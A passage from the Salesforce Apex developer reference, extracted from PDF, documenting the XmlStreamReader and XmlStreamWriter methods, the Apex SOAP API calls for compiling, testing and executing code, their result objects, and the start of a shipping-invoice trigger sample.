If there is no name, an empty string is returned. This method is only valid with start element or attribute XML events.
getAttributeNamespace(Integer)
Returns the namespace URI of the attribute at the specified index.
Signature
public String getAttributeNamespace(Integer index)
Parameters
index
Type: Integer
Return Value
Type: String
Usage
If no namespace is specified, null is returned. This method is only valid with start element or attribute XML events.
getAttributePrefix(Integer)
Returns the prefix of this attribute at the specified index.
Signature
public String getAttributePrefix(Integer index)
Parameters
index
Type: Integer
1862
Reference
XmlStreamReader Class
Return Value
Type: String
Usage
If no prefix is specified, null is returned. This method is only valid with start element or attribute XML events.
getAttributeType(Integer)
Returns the XML type of the attribute at the specified index.
Signature
public String getAttributeType(Integer index)
Parameters
index
Type: Integer
Return Value
Type: String
Usage
For example, id is an attribute type. This method is only valid with start element or attribute XML events.
getAttributeValue(String, String)
Returns the value of the attribute in the specified localName at the specified URI.
Signature
public String getAttributeValue(String namespaceURI, String localName)
Parameters
namespaceURI
Type: String
localName
Type: String
Return Value
Type: String
1863
Reference
XmlStreamReader Class
Usage
Returns null if the value is not found. You must specify a value for localName. This method is only valid with start element or
attribute XML events.
getAttributeValueAt(Integer)
Returns the value of the attribute at the specified index.
Signature
public String getAttributeValueAt(Integer index)
Parameters
index
Type: Integer
Return Value
Type: String
Usage
This method is only valid with start element or attribute XML events.
getEventType()
Returns the type of XML event the cursor is pointing to.
Signature
public System.XmlTag getEventType()
Return Value
Type: System.XmlTag
XmlTag Enum
1864
Reference
XmlStreamReader Class
ENTITY_REFERENCE
NAMESPACE
NOTATION_DECLARATION
PROCESSING_INSTRUCTION
SPACE
START_DOCUMENT
START_ELEMENT
getLocalName()
Returns the local name of the current event.
Signature
public String getLocalName()
Return Value
Type: String
Usage
For start element or end element XML events, it returns the local name of the current element. For the entity reference XML event, it
returns the entity name. The current XML event must be start element, end element, or entity reference.
getLocation()
Return the current location of the cursor.
Signature
public String getLocation()
Return Value
Type: String
Usage
If the location is unknown, returns -1. The location information is only valid until the next method is called.
getNamespace()
If the current event is a start element or end element, this method returns the URI of the prefix or the default namespace.
Signature
public String getNamespace()
1865
Reference
XmlStreamReader Class
Return Value
Type: String
Usage
Returns null if the XML event does not have a prefix.
getNamespaceCount()
Returns the number of namespaces declared on a start element or end element.
Signature
public Integer getNamespaceCount()
Return Value
Type: Integer
Usage
This method is only valid on a start element, end element, or namespace XML event.
getNamespacePrefix(Integer)
Returns the prefix for the namespace declared at the index.
Signature
public String getNamespacePrefix(Integer index)
Parameters
index
Type: Integer
Return Value
Type: String
Usage
Returns null if this is the default namespace declaration. This method is only valid on a start element, end element, or namespace
XML event.
getNamespaceURI(String)
Return the URI for the given prefix.
1866
Reference
XmlStreamReader Class
Signature
public String getNamespaceURI(String Prefix)
Parameters
Prefix
Type: String
Return Value
Type: String
Usage
The returned URI depends on the current state of the processor.
getNamespaceURIAt(Integer)
Returns the URI for the namespace declared at the index.
Signature
public String getNamespaceURIAt(Integer Index)
Parameters
Index
Type: Integer
Return Value
Type: String
Usage
This method is only valid on a start element, end element, or namespace XML event.
getPIData()
Returns the data section of a processing instruction.
Signature
public String getPIData()
Return Value
Type: String
1867
Reference
XmlStreamReader Class
getPITarget()
Returns the target section of a processing instruction.
Signature
public String getPITarget()
Return Value
Type: String
getPrefix()
Returns the prefix of the current XML event or null if the event does not have a prefix.
Signature
public String getPrefix()
Return Value
Type: String
getText()
Returns the current value of the XML event as a string.
Signature
public String getText()
Return Value
Type: String
Usage
The valid values for the different events are:
The string value of a character XML event
The string value of a comment
The replacement value for an entity reference. For example, assume getText reads the following XML snippet:
<!ENTITY
Title "Salesforce For Dummies" >
]>
<foo a=\"b\">Name &Title;</foo>';
1868
Reference
XmlStreamReader Class
getVersion()
Returns the XML version specified on the XML declaration. Returns null if none was declared.
Signature
public String getVersion()
Return Value
Type: String
hasName()
Returns true if the current XML event has a name. Returns false otherwise.
Signature
public Boolean hasName()
Return Value
Type: Boolean
Usage
This method is only valid for start element and stop element XML events.
hasNext()
Returns true if there are more XML events and false if there are no more XML events.
Signature
public Boolean hasNext()
Return Value
Type: Boolean
Usage
This method returns false if the current XML event is end document.
hasText()
Returns true if the current event has text, false otherwise.
1869
Reference
XmlStreamReader Class
Signature
public Boolean hasText()
Return Value
Type: Boolean
Usage
The following XML events have text: characters, entity reference, comment and space.
isCharacters()
Returns true if the cursor points to a character data XML event. Otherwise, returns false.
Signature
public Boolean isCharacters()
Return Value
Type: Boolean
isEndElement()
Returns true if the cursor points to an end tag. Otherwise, it returns false.
Signature
public Boolean isEndElement()
Return Value
Type: Boolean
isStartElement()
Returns true if the cursor points to a start tag. Otherwise, it returns false.
Signature
public Boolean isStartElement()
Return Value
Type: Boolean
isWhiteSpace()
Returns true if the cursor points to a character data XML event that consists of all white space. Otherwise it returns false.
1870
Reference
XmlStreamReader Class
Signature
public Boolean isWhiteSpace()
Return Value
Type: Boolean
next()
Reads the next XML event. A processor may return all contiguous character data in a single chunk, or it may split it into several chunks.
Returns an integer which indicates the type of event.
Signature
public Integer next()
Return Value
Type: Integer
nextTag()
Skips any white space (the isWhiteSpace method returns true), comment, or processing instruction XML events, until a start
element or end element is reached. Returns the index for that XML event.
Signature
public Integer nextTag()
Return Value
Type: Integer
Usage
This method throws an error if elements other than white space, comments, processing instruction, start elements or stop elements are
encountered.
setCoalescing(Boolean)
If you specify true for returnAsSingleBlock, text is returned in a single block, from a start element to the first end element
or the next start element, whichever comes first. If you specify it as false, the parser may return text in multiple blocks.
Signature
public Void setCoalescing(Boolean returnAsSingleBlock)
1871
Reference
XmlStreamWriter Class
Parameters
returnAsSingleBlock
Type: Boolean
Return Value
Type: Void
setNamespaceAware(Boolean)
If you specify true for isNamespaceAware, the parser recognizes namespace. If you specify it as false, the parser does not.
The default value is true.
Signature
public Void setNamespaceAware(Boolean isNamespaceAware)
Parameters
isNamespaceAware
Type: Boolean
Return Value
Type: Void
toString()
Returns a string containing the length of the input XML given to XmlStreamReader and the first 50 characters of the input XML.
Signature
public String toString()
Return Value
Type: String
XmlStreamWriter Class
The XmlStreamWriter class provides methods for writing XML data.
Namespace
System
1872
Reference
XmlStreamWriter Class
Usage
You can use the XmlStreamWriter class to programmatically construct an XML document, then use HTTP classes to send the
document to an external server.
The XmlStreamWriter class is similar to the XMLStreamWriter utility class from StAX.
Note: The XmlStreamWriter class in Apex is based on its counterpart in Java. See
https://stax-utils.dev.java.net/nonav/javadoc/api/javax/xml/stream/XMLStreamWriter.html.
IN THIS SECTION:
XmlStreamWriter Constructors
XmlStreamWriter Methods
SEE ALSO:
Http Class
HttpRequest Class
HttpResponse Class
XmlStreamWriter Constructors
The following are constructors for XmlStreamWriter.
IN THIS SECTION:
XmlStreamWriter()
Creates a new instance of the XmlStreamWriter class.
XmlStreamWriter()
Creates a new instance of the XmlStreamWriter class.
Signature
public XmlStreamWriter()
XmlStreamWriter Methods
The following are methods for XmlStreamWriter. All are instance methods.
IN THIS SECTION:
close()
Closes this instance of an XmlStreamWriter and free any resources associated with it.
getXmlString()
Returns the XML written by the XmlStreamWriter instance.
1873
Reference
XmlStreamWriter Class
setDefaultNamespace(String)
Binds the specified URI to the default namespace. This URI is bound in the scope of the current START_ELEMENT END_ELEMENT
pair.
writeAttribute(String, String, String, String)
Writes an attribute to the output stream.
writeCData(String)
Writes the specified CData to the output stream.
writeCharacters(String)
Writes the specified text to the output stream.
writeComment(String)
Writes the specified comment to the output stream.
writeDefaultNamespace(String)
Writes the specified namespace to the output stream.
writeEmptyElement(String, String, String)
Writes an empty element tag to the output stream.
writeEndDocument()
Closes any start tags and writes corresponding end tags to the output stream.
writeEndElement()
Writes an end tag to the output stream, relying on the internal state of the writer to determine the prefix and local name.
writeNamespace(String, String)
Writes the specified namespace to the output stream.
writeProcessingInstruction(String, String)
Writes the specified processing instruction.
writeStartDocument(String, String)
Writes the XML Declaration using the specified XML encoding and version.
writeStartElement(String, String, String)
Writes the start tag specified by localName to the output stream.
close()
Closes this instance of an XmlStreamWriter and free any resources associated with it.
Signature
public Void close()
Return Value
Type: Void
getXmlString()
Returns the XML written by the XmlStreamWriter instance.
1874
Reference
XmlStreamWriter Class
Signature
public String getXmlString()
Return Value
Type: String
setDefaultNamespace(String)
Binds the specified URI to the default namespace. This URI is bound in the scope of the current START_ELEMENT END_ELEMENT pair.
Signature
public Void setDefaultNamespace(String URI)
Parameters
URI
Type: String
Return Value
Type: Void
Signature
public Void writeAttribute(String prefix, String namespaceURI, String localName, String
value)
Parameters
prefix
Type: String
namespaceURI
Type: String
localName
Type: String
Specifies the name of the attribute.
value
Type: String
Return Value
Type: Void
1875
Reference
XmlStreamWriter Class
writeCData(String)
Writes the specified CData to the output stream.
Signature
public Void writeCData(String data)
Parameters
data
Type: String
Return Value
Type: Void
writeCharacters(String)
Writes the specified text to the output stream.
Signature
public Void writeCharacters(String text)
Parameters
text
Type: String
Return Value
Type: Void
writeComment(String)
Writes the specified comment to the output stream.
Signature
public Void writeComment(String data)
Parameters
data
Type: String
Return Value
Type: Void
1876
Reference
XmlStreamWriter Class
writeDefaultNamespace(String)
Writes the specified namespace to the output stream.
Signature
public Void writeDefaultNamespace(String namespaceURI)
Parameters
namespaceURI
Type: String
Return Value
Type: Void
Signature
public Void writeEmptyElement(String prefix, String localName, String namespaceURI)
Parameters
prefix
Type: String
localName
Type: String
Specifies the name of the tag to be written.
namespaceURI
Type: String
Return Value
Type: Void
writeEndDocument()
Closes any start tags and writes corresponding end tags to the output stream.
Signature
public Void writeEndDocument()
Return Value
Type: Void
1877
Reference
XmlStreamWriter Class
writeEndElement()
Writes an end tag to the output stream, relying on the internal state of the writer to determine the prefix and local name.
Signature
public Void writeEndElement()
Return Value
Type: Void
writeNamespace(String, String)
Writes the specified namespace to the output stream.
Signature
public Void writeNamespace(String prefix, String namespaceURI)
Parameters
prefix
Type: String
namespaceURI
Type: String
Return Value
Type: Void
writeProcessingInstruction(String, String)
Writes the specified processing instruction.
Signature
public Void writeProcessingInstruction(String target, String data)
Parameters
target
Type: String
data
Type: String
Return Value
Type: Void
1878
Reference
XmlStreamWriter Class
writeStartDocument(String, String)
Writes the XML Declaration using the specified XML encoding and version.
Signature
public Void writeStartDocument(String encoding, String version)
Parameters
encoding
Type: String
version
Type: String
Return Value
Type: Void
Signature
public Void writeStartElement(String prefix, String localName, String namespaceURI)
Parameters
prefix
Type: String
localName
Type: String
namespaceURI
Type: String
Return Value
Type: Void
1879
APPENDICES
For information on all other SOAP API calls, including those that can be used to extend or implement any existing Apex IDEs, contact
your Salesforce representative.
The following API objects are available as a Beta release in API version 23.0 and later:
ApexTestQueueItem
ApexTestResult
The following are SOAP API calls:
compileAndTest()
compileClasses()
compileTriggers()
executeanonymous()
runTests()
The following SOAP headers are available in SOAP API calls for Apex:
DebuggingHeader
PackageVersionHeader
Also see the Metadata API Developer's Guide for two additional calls:
deploy()
retrieve()
ApexTestQueueItem
Note: The API for asynchronous test runs is a Beta release.
Represents a single Apex class in the Apex job queue. This object is available in API version 23.0 and later.
1880
ApexTestQueueItem
Supported Calls
create(), describeSObjects(), query(), retrieve(), update(), upsert()
Fields
Field Name
Description
ApexClassId
Type
reference
Properties
Create, Filter, Group, Sort
Description
The Apex class whose tests are to be executed.
This field can't be updated.
ExtendedStatus
Type
string
Properties
Filter, Nillable, Sort
Description
The pass rate of the test run.
For example: (4/6). This means that four out of a total of six tests passed.
If the class fails to execute, this field contains the cause of the failure.
ParentJobId
Type
reference
Properties
Filter, Group, Nillable, Sort
Description
Read-only. Points to the AsyncApexJob that represents the entire test run.
If you insert multiple Apex test queue items in a single bulk operation, the queue
items will share the same parent job. This means that a test run can consist of
the execution of the tests of several classes if all the test queue items are inserted
in the same bulk operation.
Status
Type
picklist
Properties
Filter, Group, Restricted picklist, Sort, Update
Description
The status of the job. Valid values are:
1881
Field Name
ApexTestResult
Description
1
Holding
Queued
Preparing
Processing
Aborted
Completed
Failed
1
Usage
Insert an ApexTestQueueItem object to place its corresponding Apex class in the Apex job queue for execution. The Apex job
executes the test methods in the class.
To abort a class that is in the Apex job queue, perform an update operation on the ApexTestQueueItem object and set its Status
field to Aborted.
If you insert multiple Apex test queue items in a single bulk operation, the queue items will share the same parent job. This means that
a test run can consist of the execution of the tests of several classes if all the test queue items are inserted in the same bulk operation.
ApexTestResult
Note: The API for asynchronous test runs is a Beta release.
Represents the result of an Apex test method execution. This object is available in API version 23.0 and later.
Supported Calls
describeSObjects(), query(), retrieve()
Fields
Field Name
Details
ApexClassId
Type
reference
Properties
Filter, Group, Sort
Description
The Apex class whose test methods were executed.
1882
ApexTestResult
Field Name
Details
ApexLogId
Type
reference
Properties
Filter, Group, Nillable, Sort
Description
Points to the ApexLog for this test method execution if debug logging is enabled;
otherwise, null.
AsyncApexJobId
Type
reference
Properties
Filter, Group, Nillable, Sort
Description
Read-only. Points to the AsyncApexJob that represents the entire test run.
This field points to the same object as
ApexTestQueueItem.ParentJobId.
Message
Type
string
Properties
Filter, Nillable, Sort
Description
The exception error message if a test failure occurs; otherwise, null.
MethodName
Type
string
Properties
Filter, Group, Nillable, Sort
Description
The test method name.
Outcome
Type
picklist
Properties
Filter, Group, Restricted picklist, Sort
Description
The result of the test method execution. Can be one of these values:
Pass
Fail
CompileFail
1883
compileAndTest()
Field Name
Details
QueueItemId
Type
reference
Properties
Filter, Group, Nillable, Sort
Description
Points to the ApexTestQueueItem which is the class that this test method is part
of.
StackTrace
Type
string
Properties
Filter, Nillable, Sort
Description
The Apex stack trace if the test failed; otherwise, null.
TestTimestamp
Type
dateTime
Properties
Filter, Sort
Description
The start time of the test method.
Usage
You can query the fields of the ApexTestResult record that corresponds to a test method executed as part of an Apex class
execution.
Each test method execution is represented by a single ApexTestResult record. For example, if an Apex test class contains six test
methods, six ApexTestResult records are created. These records are in addition to the ApexTestQueueItem record that
represents the Apex class.
compileAndTest()
Compile and test your Apex in a single call.
Syntax
CompileAndTestResult[] = compileAndTest(CompileAndTestRequest request);
1884
compileAndTest()
Usage
Use this call to both compile and test the Apex you specify with a single call. Production organizations (not a Developer Edition or
Sandbox Edition) must use this call instead of compileClasses() or compileTriggers().
This call supports the DebuggingHeader and the SessionHeader. For more information about the SOAP headers in the API, see the SOAP
API Developer's Guide.
All specified tests must pass, otherwise data is not saved to the database. If this call is invoked in a production organization, the
RunTestsRequest property of the CompileAndTestRequest is ignored, and all unit tests defined in the organization are run and must
pass.
Sample CodeJava
Note that the following example sets checkOnly to true so that this class is compiled and tested, but the classes are not saved to
the database.
{
CompileAndTestRequest request;
CompileAndTestResult result = null;
String triggerBody = "trigger t1 on Account (before insert){ " +
" for(Account a:Trigger.new){ " +
"
a.description = 't1_UPDATE';}" +
"}";
String
"
"
"
"
"
"
"
"
"
"
"
"
"}";
String
"
"
"
"
"}";
1885
CompileAndTestRequest
try {
result = apexBinding.compileAndTest(request);
} catch (RemoteException e) {
System.out.println("An unexpected error occurred: " + e.getMessage());
}
assert (result.isSuccess());
}
Arguments
Name
Type
Description
request
CompileAndTestRequest
A request that includes the Apex and the values for any fields that need
to be set for this request.
Response
CompileAndTestResult
CompileAndTestRequest
The compileAndTest() call contains this object, a request with information about the Apex to be compiled.
A CompileAndTestRequest object has the following properties:
Name
Type
Description
checkOnly
boolean
If set to true, the Apex classes and triggers submitted are not saved to your
organization, whether or not the code successfully compiles and unit tests pass.
classes
string
deleteClasses
string
deleteTriggers
string
runTestsRequest
RunTestsRequest
Specifies information about the Apex to be tested. If this request is sent in a production
organization, this property is ignored and all unit tests are run for your entire
organization.
triggers
string
1886
CompileAndTestResult
CompileAndTestResult
The compileAndTest() call returns information about the compile and unit test run of the specified Apex, including whether it
succeeded or failed.
A CompileAndTestResult object has the following properties:
Name
Type
Description
classes
CompileClassResult
deleteClasses
DeleteApexResult
deleteTriggers
DeleteApexResult
runTestsResult
RunTestsResult
Information about the success or failure of the Apex unit tests, if any were
specified.
success
boolean*
If true, all of the classes, triggers, and unit tests specified ran successfully.
If any class, trigger, or unit test failed, the value is false, and details are
reported in the corresponding result object:
CompileClassResult
CompileTriggerResult
DeleteApexResult
RunTestsResult
triggers
CompileTriggerResult
CompileClassResult
This object is returned as part of a compileAndTest() or compileClasses() call. It contains information about whether or
not the compile and run of the specified Apex was successful.
A CompileClassResult object has the following properties:
Name
Type
Description
bodyCrc
int*
column
int*
id
ID*
line
int*
name
string*
1887
CompileAndTestResult
Name
Type
Description
problem
string*
success
boolean*
If true, the class or classes compiled successfully. If false, problems are specified
in other properties of this object.
CompileTriggerResult
This object is returned as part of a compileAndTest() or compileTriggers() call. It contains information about whether or
not the compile and run of the specified Apex was successful.
A CompileTriggerResult object has the following properties:
Name
Type
Description
bodyCrc
int*
column
int*
id
ID*
line
int*
name
string*
problem
string*
success
boolean*
If true, all the specified triggers compiled and ran successfully. If the compilation
or execution of any trigger fails, the value is false.
DeleteApexResult
This object is returned when the compileAndTest() call returns information about the deletion of a class or trigger.
A DeleteApexResult object has the following properties:
Name
Type
Description
id
ID*
problem
string*
success
boolean*
If true, all the specified classes or triggers were deleted successfully. If any class or
trigger is not deleted, the value is false.
1888
compileClasses()
compileClasses()
Compile your Apex in Developer Edition or sandbox organizations.
Syntax
CompileClassResult[] = compileClasses(string[] classList);
Usage
Use this call to compile Apex classes in Developer Edition or sandbox organizations. Production organizations must use
compileAndTest().
This call supports the DebuggingHeader and the SessionHeader. For more information about the SOAP headers in the API, see the SOAP
API Developer's Guide.
Sample CodeJava
public void compileClassesSample() {
String p1 = "public class p1 {\n"
+ "public static Integer var1 = 0;\n"
+ "public static void methodA() {\n"
+ " var1 = 1;\n" + "}\n"
+ "public static void methodB() {\n"
+ " p2.MethodA();\n" + "}\n"
+ "}";
String p2 = "public class p2 {\n"
+ "public static Integer var1 = 0;\n"
+ "public static void methodA() {\n"
+ " var1 = 1;\n" + "}\n"
+ "public static void methodB() {\n"
+ " p1.MethodA();\n" + "}\n"
+ "}";
CompileClassResult[] r = new CompileClassResult[0];
try {
r = apexBinding.compileClasses(new String[]{p1, p2});
} catch (RemoteException e) {
System.out.println("An unexpected error occurred: "
+ e.getMessage());
}
if (!r[0].isSuccess()) {
System.out.println("Couldn't compile class p1 because: "
+ r[0].getProblem());
}
if (!r[1].isSuccess()) {
System.out.println("Couldn't compile class p2 because: "
+ r[1].getProblem());
}
}
1889
compileTriggers()
Arguments
Name
Type
Description
scripts
string*
A request that includes the Apex classes and the values for any fields that need to be
set for this request.
Response
CompileClassResult
compileTriggers()
Compile your Apex triggers in Developer Edition or sandbox organizations.
Syntax
CompileTriggerResult[] = compileTriggers(string[] triggerList);
Usage
Use this call to compile the specified Apex triggers in your Developer Edition or sandbox organization. Production organizations must
use compileAndTest().
This call supports the DebuggingHeader and the SessionHeader. For more information about the SOAP headers in the API, see the SOAP
API Developer's Guide.
Arguments
Name
Type
Description
scripts
string*
A request that includes the Apex trigger or triggers and the values for any fields that
need to be set for this request.
Response
CompileTriggerResult
1890
executeanonymous()
executeanonymous()
Executes a block of Apex.
Syntax
ExecuteAnonymousResult[] = binding.executeanonymous(string apexcode);
Usage
Use this call to execute an anonymous block of Apex. This call can be executed from AJAX.
This call supports the API DebuggingHeader and SessionHeader.
If a component in a package with restricted API access issues this call, the request is blocked.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Arguments
Name
Type
Description
apexcode
string*
A block of Apex.
Response
ExecuteAnonymousResult[]
ExecuteAnonymousResult
The executeanonymous() call returns information about whether or not the compile and run of the code was successful.
An ExecuteAnonymousResult object has the following properties:
Name
Type
Description
column
int*
If compiled is False, this field contains the column number of the point where
the compile failed.
compileProblem
string*
If compiled is False, this field contains a description of the problem that caused
the compile to fail.
compiled
boolean*
If True, the code was successfully compiled. If False, the column, line, and
compileProblem fields are not null.
1891
Name
Type
runTests()
Description
exceptionMessage string*
If success is False, this field contains the exception message for the failure.
exceptionStackTrace string*
If success is False, this field contains the stack trace for the failure.
line
int*
If compiled is False, this field contains the line number of the point where the
compile failed.
success
boolean*
runTests()
Run your Apex unit tests.
Syntax
RunTestsResult[] = binding.runTests(RunTestsRequest request);
Usage
To facilitate the development of robust, error-free code, Apex supports the creation and execution of unit tests. Unit tests are class
methods that verify whether a particular piece of code is working properly. Unit test methods take no arguments, commit no data to
the database, send no emails, and are flagged with the testMethod keyword or the isTest annotation in the method definition.
Also, test methods must be defined in test classes, that is, classes annotated with isTest. Use this call to run your Apex unit tests.
This call supports the DebuggingHeader and the SessionHeader. For more information about the SOAP headers in the API, see the SOAP
API Developer's Guide.
Sample CodeJava
public void runTestsSample() {
String sessionId = "sessionID goes here";
String url = "url goes here";
// Set the Apex stub with session ID received from logging in with the partner API
_SessionHeader sh = new _SessionHeader();
apexBinding.setHeader(
new ApexServiceLocator().getServiceName().getNamespaceURI(),
"SessionHeader", sh);
// Set the URL received from logging in with the partner API to the Apex stub
apexBinding._setProperty(ApexBindingStub.ENDPOINT_ADDRESS_PROPERTY, url);
// Set the debugging header
_DebuggingHeader dh = new _DebuggingHeader();
dh.setDebugLevel(LogType.Profiling);
apexBinding.setHeader(
1892
runTests()
new ApexServiceLocator().getServiceName().getNamespaceURI(),
"DebuggingHeader", dh);
long start = System.currentTimeMillis();
RunTestsRequest rtr = new RunTestsRequest();
rtr.setAllTests(true);
RunTestsResult res = null;
try {
res = apexBinding.runTests(rtr);
} catch (RemoteException e) {
System.out.println("An unexpected error occurred: " + e.getMessage());
}
System.out.println("Number of tests: " + res.getNumTestsRun());
System.out.println("Number of failures: " + res.getNumFailures());
if (res.getNumFailures() > 0) {
for (RunTestFailure rtf : res.getFailures()) {
System.out.println("Failure: " + (rtf.getNamespace() ==
null ? "" : rtf.getNamespace() + ".")
+ rtf.getName() + "." + rtf.getMethodName() + ": "
+ rtf.getMessage() + "\n" + rtf.getStackTrace());
}
}
if (res.getCodeCoverage() != null) {
for (CodeCoverageResult ccr : res.getCodeCoverage()) {
System.out.println("Code coverage for " + ccr.getType() +
(ccr.getNamespace() == null ? "" : ccr.getNamespace() + ".")
+ ccr.getName() + ": "
+ ccr.getNumLocationsNotCovered()
+ " locations not covered out of "
+ ccr.getNumLocations());
if (ccr.getNumLocationsNotCovered() > 0) {
for (CodeLocation cl : ccr.getLocationsNotCovered())
System.out.println("\tLine " + cl.getLine());
}
}
}
System.out.println("Finished in " +
(System.currentTimeMillis() - start) + "ms");
}
Arguments
Name
Type
Description
request
RunTestsRequest
A request that includes the Apex unit tests and the values for any fields that
need to be set for this request.
1893
RunTestsRequest
Response
RunTestsResult
RunTestsRequest
Specifies information about the Apex code to be tested. RunTestsRequest is part of CompileAndTestRequest, which is the request passed
to the compileAndTest() call. You can specify the same or different classes to be tested and compiled. Since triggers cannot be
tested directly, they are not included in this object. Instead, you must specify a class that calls the trigger.
If the request is sent to a production organization, this request is ignored and all unit tests defined for your organization are run.
The RunTestsRequest object has the following properties:
Name
Type
Description
allTests
boolean*
If allTests is true, all unit tests defined for your organization are run.
classes
string*[]
namespace
string
If specified, the namespace that contains the unit tests to be run. Do not use this
property if you specify allTests as true. Also, if you execute compileAndTest()
in a production organization, this property is ignored, and all unit tests defined for
the organization are run.
packages
string*[]
Do not use after version 10.0. For earlier, unsupported releases, the content of the
package to be tested.
RunTestsResult
The call returns information about whether or not the compilation of the specified Apex was successful and if the unit tests completed
successfully.
A RunTestsResult object has the following properties:
Name
Type
Description
codeCoverage
CodeCoverageResult[]
codeCoverageWarnings CodeCoverageWarning[]
An array of one or more code coverage warnings for the test run.
The results include both the total number of lines that could have
been executed, as well as the number, line, and column positions
of code that was not executed.
failures
RunTestFailure[]
numFailures
int
numTestsRun
int
1894
RunTestsResult
Name
Type
Description
successes
RunTestSuccess[]
totalTime
double
The total cumulative time spent running tests. This can be helpful
for performance monitoring.
CodeCoverageResult
The RunTestsResult object contains this object. It contains information about whether or not the compile of the specified Apex and run
of the unit tests was successful.
A CodeCoverageResult object has the following properties:
Name
Type
Description
dmlInfo
CodeLocation[]
For each class or trigger tested, for each portion of code tested, this property contains
the DML statement locations, the number of times the code was executed, and the
total cumulative time spent in these calls. This can be helpful for performance
monitoring.
id
ID
locationsNotCovered CodeLocation[]
For each class or trigger tested, if any code is not covered, the line and column of the
code not tested, and the number of times the code was executed.
methodInfo
CodeLocation[]
For each class or trigger tested, the method invocation locations, the number of times
the code was executed, and the total cumulative time spent in these calls. This can
be helpful for performance monitoring.
name
string
namespace
string
numLocations
int
soqlInfo
CodeLocation[]
For each class or trigger tested, the location of SOQL statements in the code, the
number of times this code was executed, and the total cumulative time spent in
these calls. This can be helpful for performance monitoring.
soslInfo
CodeLocation[]
For each class tested, the location of SOSL statements in the code, the number of
times this code was executed, and the total cumulative time spent in these calls. This
can be helpful for performance monitoring.
type
string
CodeCoverageWarning
The RunTestsResult object contains this object. It contains information about the Apex class which generated warnings.
This object has the following properties:
1895
RunTestsResult
Name
Type
Description
id
ID
message
string
name
string
The name of the class that generated a warning. If the warning applies to the overall
code coverage, this value is null.
namespace
string
RunTestFailure
The RunTestsResult object returns information about failures during the unit test run.
This object has the following properties:
Name
Type
Description
id
ID
message
string
methodName
string
name
string
namespace
string
stackTrace
string
time
double
The time spent running tests for this failed operation. This can be helpful for
performance monitoring.
type
string
RunTestSuccess
The RunTestsResult object returns information about successes during the unit test run.
This object has the following properties:
Name
Type
Description
id
ID
methodName
string
name
string
namespace
string
time
double
The time spent running tests for this operation. This can be helpful for performance
monitoring.
1896
DebuggingHeader
CodeLocation
The RunTestsResult object contains this object in a number of fields.
This object has the following properties:
Name
Type
Description
column
int
line
int
numExecutions
int
The number of times the Apex was executed in the test run.
time
double
The total cumulative time spent at this location. This can be helpful for performance
monitoring.
DebuggingHeader
Specifies that the response will contain the debug log in the return header, and specifies the level of detail in the debug header.
API Calls
compileAndTest()executeanonymous()runTests()
Fields
Element Name
Type
Description
debugLevel
logtype
This field has been deprecated and is only provided for backwards compatibility. Specifies
the type of information returned in the debug log. The values are listed from the least
amount of information returned to the most information returned. Valid values include:
NONE
DEBUGONLY
DB
PROFILING
CALLOUT
DETAIL
categories
LogInfo[]
Specifies the type, as well as the amount of information returned in the debug log.
LogInfo
Specifies the type, as well as the amount of information, returned in the debug log. The categories field takes a list of these objects.
1897
PackageVersionHeader
Fields
Element Name
Type
Description
LogCategory
string
Specify the type of information returned in the debug log. Valid values are:
Db
Workflow
Validation
Callout
Apex_code
Apex_profiling
All
LogCategoryLevel string
Specifies the amount of information returned in the debug log. Only the Apex_code
LogCategory uses the log category levels.
Valid log levels are (listed from lowest to highest):
ERROR
WARN
INFO
DEBUG
FINE
FINER
FINEST
PackageVersionHeader
Specifies the package version for each installed managed package. A package version is a number that identifies the set of components
uploaded in a package. The version number has the format majorNumber.minorNumber.patchNumber (for example, 2.1.3).
The major and minor numbers increase to a chosen value during every major release. The patchNumber is generated and updated
only for a patch release. As well as a set of components, a package version encompasses specific behavior. Publishers can use package
versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without breaking
existing customer integrations using the package.
A managed package can have several versions with different content and behavior. This header allows you to specify the version used
for each package referenced by your API client. If a package version is not specified for a package, the API client uses the version of the
package that is selected in the Version Settings section under Setup, in Develop > API. This header is available in API version 16.0 and
later.
API Calls
compileAndTest(), compileClasses(), compileTriggers(), executeanonymous()
1898
PackageVersionHeader
Fields
Element Name
Type
Description
packageVersions PackageVersion[] A list of package versions for installed managed packages referenced by your API client.
PackageVersion
Specifies a version of an installed managed package. It includes the following fields:
Field
Type
Description
majorNumber
int
minorNumber
int
namespace
string
1899
Scenario
In this sample application, the user creates a new shipping invoice, or order, and then adds items to the invoice. The total amount for
the order, including shipping cost, is automatically calculated and updated based on the items added or deleted from the invoice.
Type
Description
Name
String
Price
Currency
Quantity
Number
Weight
Number
1900
Name
Type
Description
Shipping_invoice
Master-Detail (shipping_invoice)
Type
Description
Name
String
Subtotal
Currency
The subtotal
GrandTotal
Currency
Shipping
Currency
ShippingDiscount
Currency
Tax
Currency
TotalWeight
Number
All of the Apex for this application is contained in triggers. This application has the following triggers:
Object
Trigger Name
When Runs
Item
Calculate
after insert, after update, after delete Updates the shipping invoice, calculates the totals and
shipping
Shipping_invoice ShippingDiscount
Description
after update
The following is the general flow of user actions and when triggers run:
1901
Flow of user action and triggers for the shopping cart application
1. User clicks Orders > New, names the shipping invoice and clicks Save.
2. User clicks New Item, fills out information, and clicks Save.
3. Calculate trigger runs. Part of the Calculate trigger updates the shipping invoice.
4. ShippingDiscount trigger runs.
5. User can then add, delete or change items in the invoice.
In Shipping Invoice Example Code both of the triggers and the test class are listed. The comments in the code explain the functionality.
1902
Calculate Trigger
trigger calculate on Item__c (after insert, after update, after delete) {
// Use a map because it doesn't allow duplicate values
Map<ID, Shipping_Invoice__C> updateMap = new Map<ID, Shipping_Invoice__C>();
// Set this integer to -1 if we are deleting
Integer subtract ;
// Populate the list of items based on trigger type
List<Item__c> itemList;
if(trigger.isInsert || trigger.isUpdate){
itemList = Trigger.new;
subtract = 1;
}
else if(trigger.isDelete)
{
// Note -- there is no trigger.new in delete
itemList = trigger.old;
subtract = -1;
}
// Access all the information we need in a single query
// rather than querying when we need it.
// This is a best practice for bulkifying requests
set<Id> AllItems = new set<id>();
for(item__c i :itemList){
// Assert numbers are not negative.
// None of the fields would make sense with a negative value
System.assert(i.quantity__c > 0, 'Quantity must be positive');
System.assert(i.weight__c >= 0, 'Weight must be non-negative');
System.assert(i.price__c >= 0, 'Price must be non-negative');
// If there is a duplicate Id, it won't get added to a set
AllItems.add(i.Shipping_Invoice__C);
}
// Accessing all shipping invoices associated with the items in the trigger
List<Shipping_Invoice__C> AllShippingInvoices = [SELECT Id, ShippingDiscount__c,
1903
1904
1905
